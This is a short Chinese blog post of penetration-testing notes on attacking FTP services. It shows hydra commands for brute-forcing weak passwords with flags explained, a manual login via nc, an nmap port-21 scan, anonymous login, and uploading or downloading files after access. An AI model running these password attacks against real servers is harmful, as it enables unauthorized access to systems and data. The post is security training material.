FTP漏洞利用
参考资料:
https://www.cnblogs.com/renhaoblog/p/13065978.html
https://www.jianshu.com/p/9498ccf62348
ftp弱口令爆破
1.hydra
hydra -l user -p root ftp://192.168.0.1
-l指定账号是user -p指定账号是root
hydra targetIP ftp -L users.txt -P pass.txt -V
targetIP是目标服务器的IP地址
ftp 是协议
-L 指定一个帐号字典
-l 指定用户
-P 指定一个密码字典
-p 指定密码
-V 现实爆破测试的详细过程
-f 成功爆破一个账号就停止爆破
nc 192.168.2.132 21
USER [用户名]
PASS [密码]
PWD //显示当前工作目录
SYST //返回服务器使用的操作系统
HELP //帮助信息
2.ftp匿名用户登录
nmap -p 21 10.0.2.5
PORT STATE SERVICE
21/tcp open ftp
登录FTP后可以使用的命令
https://www.cnblogs.com/bevis-jiang/archive/2011/11/29/2267588.html
https://blog.csdn.net/bestone0213/article/details/41892921
进一步利用
https://blog.csdn.net/qq_39004632/article/details/89327182
1.上传下载文件
ftp> get 文件名 //下载(也可以在前面Windows的浏览器里直接下载)
ftp> put 文件路径\文件名 //上传
作者:
Shu-How Z
本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须在文章页面给出原文连接,否则保留追究法律责任的权利。
浙公网安备 33010602011771号